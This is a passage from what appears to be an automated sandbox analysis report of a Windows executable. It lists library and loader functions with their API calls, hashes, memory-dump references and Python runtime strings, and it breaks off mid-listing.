API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction ID: 8a0beec4657a7815b19838cc710d74aa1cf712b9ed1eef60bf7f5b2b335f6cec
Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction Fuzzy Hash: F5513721B09B41A6FB289E2D948467A6293BF46BA4F884770EF7DC77D5CE3CE5008700

Function 00007FF6BA3BC134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF6BA3BC2CD), ref: 00007FF6BA3BC180
GetLastError.KERNEL32(?,?,?,?,?,00007FF6BA3BC2CD), ref: 00007FF6BA3BC18A

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction ID: 2e12372404bb75e630f27f2dcab915c789a23ffa6ebb811527d2b191df68c771
Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction Fuzzy Hash: 66110162708B9181DA208B29A804169A362AB49FF4F984371EFBDCB7E9CF7CD4518700

Function 00007FF6BA3BA948 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA95E
GetLastError.KERNEL32(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA968

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
Instruction ID: 3221580bd8278cb56b25abd23b60b7f4aa11875fc1124d0700f772c3282f6406
Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
Instruction Fuzzy Hash: 88E08C20F19A0643FF496FFAA8451382262AF88B41F8442B0DF1DC22A1EE2C68818320

Function 00007FF6BA3BAB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,00007FF6BA3BA9D5,?,?,00000000,00007FF6BA3BAA8A), ref: 00007FF6BA3BABC6
GetLastError.KERNEL32(?,?,?,00007FF6BA3BA9D5,?,?,00000000,00007FF6BA3BAA8A), ref: 00007FF6BA3BABD0

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction ID: c4c863d9a9f2aa53c30544939d376d09e66ce796af34c7608f5e543c0549db74
Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction Fuzzy Hash: 68219321F18E8283FEA49769949537D16839F887A4FC843B9DF2EC77D2DE6CA4854300

Function 00007FF6BA3BBEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3BBED4

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction ID: 2d5e62faf8d087b7a2871d42b9125e7fedfc88b4f3c558eacc28176e6673b9ec
Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction Fuzzy Hash: A641C132919A4587EA349F2DA64127977A2EB55B81F900372EF8EC37D1CF6CE402CB51

Function 00007FF6BA3A7F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF6BA3A803A

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 7b0bfe6dda5be6348f5dea9afb2976fe88cae53a5ed3d6ba0ce225c2e8636390
Instruction ID: 5b03a73843d6e72cb3d511d342e393f99775f96de53e1b95dd61511d0c8ca11b
Opcode Fuzzy Hash: 7b0bfe6dda5be6348f5dea9afb2976fe88cae53a5ed3d6ba0ce225c2e8636390
Instruction Fuzzy Hash: 0221A321B18A6256FE50DA2AA9043BEE652BF45BC4F8844B0EF0DC7786DE7DE046C300

Function 00007FF6BA3BB93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3BB9C2

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
Instruction ID: 561f36ce20f8d9876c061068123aba0c8bd1c0d51e69060b0fd72c9c26a91bd8
Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
Instruction Fuzzy Hash: 22315E32A18E1285EA516F5D884137C3A92AF84B94FC103B5EF5DC73D2CEBCA4418715

Function 00007FF6BA3B9961 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6BA3B998F

Part of subcall function 00007FF6BA3B9A88: GetModuleHandleExW.KERNEL32 ref: 00007FF6BA3B9AAD
Part of subcall function 00007FF6BA3B9A88: GetProcAddress.KERNEL32 ref: 00007FF6BA3B9AC3
Part of subcall function 00007FF6BA3B9A88: FreeLibrary.KERNEL32 ref: 00007FF6BA3B9AEA

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
Instruction ID: d158c404bbb1e4feafd67e5fdc12f0abf367c049a39065c67b62ca2a53a296a1
Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
Instruction Fuzzy Hash: F4217A72E14B468EEB648F68C4902EC33A1FB44718F84467ADB6DC6AD5DF38D584CB40

Function 00007FF6BA3B5F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B5EF9

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: 9f4c7147dfa47939fd776ed0faefe9f973fa16268f0bc98a83545da7d521671b
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: 44117531E1CE4182FAA09F5994001BDA666BF85B84FC44672EF4DD7B96CF3DD4008700

Function 00007FF6BA3C6354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C6377

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction ID: 0b51025a930cd07badc35c3cc97dbc5f21194d3d47be7299de1440cbcf87ece4
Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction Fuzzy Hash: 5D219232A18B8186DB618F1CD8413797AA1FB84B54F545234EF5DC76D9EF3CD4518B00

Function 00007FF6BA3B03BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B0410

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: 422d9f1954e68c8f767eb45eda4488e6bd0fc683700c8d32fe1718e3f714c45c
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: 29018821B08F4541E904DF5A99421A9AA96FF86FE0F8847B1DF5CD7BD6DE3CD5014700

Function 00007FF6BA3BEB98 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF6BA3BB32A,?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A), ref: 00007FF6BA3BEBED

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
Instruction ID: 8882c5eb4bd230fe5bcbe8ede7195bf55261286b9ff7d48f2077dfc522faf57c
Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
Instruction Fuzzy Hash: 68F01254B0DB1682FE5997AD98552B552965F88B40FAC47B0CF0FC63D1ED1CE4814310

Function 00007FF6BA3BD5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF6BA3B0C90,?,?,?,00007FF6BA3B22FA,?,?,?,?,?,00007FF6BA3B3AE9), ref: 00007FF6BA3BD63A

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction ID: 740c7bfd3d3b2ec6e199cfb04274249a64034ef9177ba3c6e438c5b73f8f8ddd
Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction Fuzzy Hash: 4CF0F810F19B4745FEA85B7A58517B912925FC47E0FC807B0DF2EC62C2EE3CA4808720

Non-executed Functions

Function 00007FF6BA3A5830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A5840
GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A5852
GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A5889
GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A589B
GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A58B4
GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A58C6
GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A58DF
GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A58F1
GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A590D
GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A591F
GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A593B
GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A594D
GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A5969
GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A597B
GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A5997
GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A59A9
GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A59C5
GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A59D7

Strings

PyUnicode_AsUTF8, xrefs: 00007FF6BA3A5EC3, 00007FF6BA3A5EE5
PyConfig_SetBytesString, xrefs: 00007FF6BA3A5A17, 00007FF6BA3A5A39
PyErr_Clear, xrefs: 00007FF6BA3A5AA1, 00007FF6BA3A5AC3
PyMarshal_ReadObjectFromString, xrefs: 00007FF6BA3A5C6D, 00007FF6BA3A5C8F
GetProcAddress, xrefs: 00007FF6BA3A5868
PyErr_Fetch, xrefs: 00007FF6BA3A5ACF, 00007FF6BA3A5AF1
Py_DecodeLocale, xrefs: 00007FF6BA3A587F, 00007FF6BA3A58A1
Py_PreInitialize, xrefs: 00007FF6BA3A595F, 00007FF6BA3A5981
PyConfig_Clear, xrefs: 00007FF6BA3A598D, 00007FF6BA3A59AF
PyErr_NormalizeException, xrefs: 00007FF6BA3A5AFD, 00007FF6BA3A5B1F
Py_ExitStatusException, xrefs: 00007FF6BA3A58AA, 00007FF6BA3A58CC
PyConfig_SetWideStringList, xrefs: 00007FF6BA3A5A73, 00007FF6BA3A5A95
PyEval_EvalCode, xrefs: 00007FF6BA3A5BB5, 00007FF6BA3A5BD7
PyObject_Str, xrefs: 00007FF6BA3A5DAF, 00007FF6BA3A5DD1
Py_InitializeFromConfig, xrefs: 00007FF6BA3A5903, 00007FF6BA3A5925
PyConfig_Read, xrefs: 00007FF6BA3A59E9, 00007FF6BA3A5A0B
PyUnicode_FromFormat, xrefs: 00007FF6BA3A5F4D, 00007FF6BA3A5F6F
PyUnicode_DecodeFSDefault, xrefs: 00007FF6BA3A5F1F, 00007FF6BA3A5F41
PySys_GetObject, xrefs: 00007FF6BA3A5E67, 00007FF6BA3A5E89
Py_Finalize, xrefs: 00007FF6BA3A58D5, 00007FF6BA3A58F7
Failed to get address for %hs, xrefs: 00007FF6BA3A5861
PyMem_RawFree, xrefs: 00007FF6BA3A5C9B, 00007FF6BA3A5CBD
PyRun_SimpleStringFlags, xrefs: 00007FF6BA3A5E0B, 00007FF6BA3A5E2D
PyObject_CallFunction, xrefs: 00007FF6BA3A5CF7, 00007FF6BA3A5D19
Py_IsInitialized, xrefs: 00007FF6BA3A5931, 00007FF6BA3A5953
PyImport_AddModule, xrefs: 00007FF6BA3A5BE3, 00007FF6BA3A5C05
PyErr_Print, xrefs: 00007FF6BA3A5B59, 00007FF6BA3A5B7B
PyUnicode_Join, xrefs: 00007FF6BA3A5FA9, 00007FF6BA3A5FCB
PyImport_ExecCodeModule, xrefs: 00007FF6BA3A5C11, 00007FF6BA3A5C33
PyModule_GetDict, xrefs: 00007FF6BA3A5CC9, 00007FF6BA3A5CEB
PyUnicode_FromString, xrefs: 00007FF6BA3A5F7B, 00007FF6BA3A5F9D
PyConfig_InitIsolatedConfig, xrefs: 00007FF6BA3A59BB, 00007FF6BA3A59DD
PyImport_ImportModule, xrefs: 00007FF6BA3A5C3F, 00007FF6BA3A5C61
PyObject_GetAttrString, xrefs: 00007FF6BA3A5D53, 00007FF6BA3A5D75
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF6BA3A5DDD, 00007FF6BA3A5DFF
PySys_SetObject, xrefs: 00007FF6BA3A5E95, 00007FF6BA3A5EB7
PyErr_Restore, xrefs: 00007FF6BA3A5B87, 00007FF6BA3A5BA9
PyConfig_SetString, xrefs: 00007FF6BA3A5A45, 00007FF6BA3A5A67
PyUnicode_Decode, xrefs: 00007FF6BA3A5EF1, 00007FF6BA3A5F13
PyErr_Occurred, xrefs: 00007FF6BA3A5B2B, 00007FF6BA3A5B4D
PyUnicode_Replace, xrefs: 00007FF6BA3A5FD7, 00007FF6BA3A5FF9
PyObject_SetAttrString, xrefs: 00007FF6BA3A5D81, 00007FF6BA3A5DA3
Py_DecRef, xrefs: 00007FF6BA3A5836, 00007FF6BA3A5858
PyStatus_Exception, xrefs: 00007FF6BA3A5E39, 00007FF6BA3A5E5B
PyObject_CallFunctionObjArgs, xrefs: 00007FF6BA3A5D25, 00007FF6BA3A5D47

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction ID: a7bdb1486f0234e0303d3add4b3b2ed7e4a09d5202b0bc22dd93af5543ed65ed
Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction Fuzzy Hash: CA22BE74A09B37A1FA549F6DAC145B863A5BF14781F4890B6DE2EC2260FF3CB589C350

Function 00007FF6BA3C40AC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF6BA3C40FA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C4766
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C48DC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C4B9A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C4DBA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C4FF7
memcpy_s.LIBCPMT ref: 00007FF6BA3C50D2
memcpy_s.LIBCPMT ref: 00007FF6BA3C517D
